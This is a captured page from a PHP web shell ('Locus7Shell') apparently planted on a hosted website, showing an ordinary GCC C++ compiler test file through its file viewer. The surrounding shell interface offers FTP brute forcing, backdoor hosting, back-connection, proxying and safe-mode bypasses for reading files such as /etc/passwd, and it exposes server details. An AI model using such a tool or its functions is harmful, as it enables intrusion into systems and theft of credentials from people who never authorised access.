Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/torture/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr56029.C (3.66 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// PR tree-optimization/56029
// { dg-do compile }
// { dg-additional-options "-Wno-return-type" }

template <class T>
struct DefaultDeleter
{
  void operator () (T * ptr) { delete ptr; }
};
template <class T, class D>
struct scoped_ptr_impl
{
  scoped_ptr_impl (T * p):data_ (p) {}
  template <typename U, typename V>
  scoped_ptr_impl (scoped_ptr_impl <U, V> *other):data_ (other->release (), get_deleter ()) {}
  ~scoped_ptr_impl () { static_cast <D> (data_) (data_.ptr); }
  void reset (T * p) { data_.ptr = p; }
  D get_deleter () {}
  T *release () { data_.ptr = __null; }
  struct Data
  : D
  {
    Data (T *) : ptr () {}
    Data (T *, D) : D (), ptr () {}
    T *ptr;
  };
  Data data_;
};
template <class T, class D = DefaultDeleter <T> >
struct scoped_ptr
{
  struct RValue
  {
    RValue (scoped_ptr * object):object (object) {}
    scoped_ptr *object;
  };
  scoped_ptr Pass () { return scoped_ptr ((this)); }
  typedef T element_type;
  typedef D deleter_type;
  scoped_ptr () : impl_ (__null) {}
  scoped_ptr (RValue rvalue) : impl_ (&rvalue.object->impl_) {}
  void reset (element_type * p) { impl_.reset (p); }
  scoped_ptr_impl <element_type, deleter_type> impl_;
};
template <typename>
struct Callback;
struct ClientSocketFactory;
struct DatagramClientSocket;
struct DnsSocketPool
{
  scoped_ptr <DatagramClientSocket> CreateConnectedSocket ();
  ClientSocketFactory *socket_factory_;
};
int RandInt (int, int);
struct BindStateBase {};
struct CallbackBase
{
  CallbackBase (BindStateBase *);
  ~CallbackBase ();
};
template <typename, typename, typename>
struct BindState;
template <typename R, typename A1, typename A2>
struct Callback <R (A1, A2)> : CallbackBase
{
  template <typename Runnable, typename BindRunType, typename BoundArgsType>
  Callback (BindState <Runnable, BindRunType, BoundArgsType> *bind_state) : CallbackBase (bind_state) {}
};
typedef Callback <int (int, int)>
RandIntCallback;
struct ClientSocketFactory
{
  virtual DatagramClientSocket *CreateDatagramClientSocket (RandIntCallback) = 0;
};
template <typename>
struct RunnableAdapter;
template <typename R, typename A1, typename A2>
struct RunnableAdapter <R (*) (A1, A2)>
{
  typedef R (RunType) (A1, A2);
};
template <typename T>
struct FunctorTraits
{
  typedef RunnableAdapter <T> RunnableType;
  typedef typename RunnableType::RunType RunType;
};
template <typename T>
typename FunctorTraits <T>::RunnableType MakeRunnable (T)
{
}
template <int, typename, typename>
struct Invoker;
template <typename StorageType, typename R, typename X1, typename X2>
struct Invoker <0, StorageType, R (X1, X2)>
{
  typedef R (UnboundRunType) (X1, X2);
};
template <typename Runnable, typename RunType>
struct BindState <Runnable, RunType, void ()> : BindStateBase
{
  typedef Runnable RunnableType;
  typedef Invoker <0, BindState, RunType> InvokerType;
  typedef typename InvokerType::UnboundRunType UnboundRunType;
  BindState (Runnable):runnable_ () {}
  RunnableType runnable_;
};
template <typename Functor>
Callback <typename BindState <typename FunctorTraits <Functor>::RunnableType, typename FunctorTraits <Functor>::RunType, void ()>::UnboundRunType>
Bind (Functor functor)
{
  typedef typename FunctorTraits <Functor>::RunnableType RunnableType;
  typedef typename FunctorTraits <Functor>::RunType RunType;
  typedef BindState <RunnableType, RunType, void ()> BindState;
  Callback <typename BindState::UnboundRunType> (new BindState (MakeRunnable (functor)));
}
struct DatagramClientSocket
{
  virtual ~ DatagramClientSocket ();
};
scoped_ptr <DatagramClientSocket>
DnsSocketPool::CreateConnectedSocket ()
{
  scoped_ptr <DatagramClientSocket> socket;
  socket.reset (socket_factory_->CreateDatagramClientSocket (Bind (RandInt)));
  socket.Pass ();
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0058 ]--